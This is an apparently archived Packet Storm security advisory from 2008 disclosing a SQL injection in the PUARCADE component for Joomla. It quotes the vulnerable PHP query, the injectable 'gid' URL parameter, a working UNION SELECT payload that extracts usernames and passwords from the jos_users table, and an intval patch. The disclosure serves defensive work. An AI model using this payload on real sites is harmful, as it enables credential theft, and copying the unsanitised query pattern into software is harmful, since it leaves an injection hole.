joomlapuarcade22-sql.txt

2008-04-10T00:00:00
ID PACKETSTORM:65394
Type packetstorm
Reporter MantiS
Modified 2008-04-10T00:00:00

Description

                                        
                                            `I discovered a vulnerability in Component PUARCADE for joomla (the last version is vulnerable) .  
  
SQL Injection vulnerability in puarcade.class.php <= V. 2.2 , component for JOOMLA .  
--------------------------------------------------------------------------------------------------------------------------  
  
Author : MantiS  
---------  
  
Vulnerable code :  
------------------------  
function warningByGame($gid) {  
global $database;  
  
$query = "SELECT c.id, c.name, c.description, c.warningrequired, c.imagename FROM #__puarcade_games as g, #__puarcade_contentrating as c"  
. " WHERE g.contentratingid = c.id"  
. " AND g.id = $gid";  
$database->setQuery($query);  
$cont = $database->loadObjectList();  
--------------------------  
  
Exploit : http://website.com/joomla_path/index.php?option=com_puarcade&Itemid=1&gid=[SQL INJECTION]  
---------  
Can be exploited with a "0 UNION SELECT password,username,0,0,0 from jos_users--" (5 columns) .  
  
Patch :  
--------  
Place before "$query = "SELECT c.id......... " :  
$gid = intval($_GET['gid']);  
To force $gid variable conversion at an integer .  
`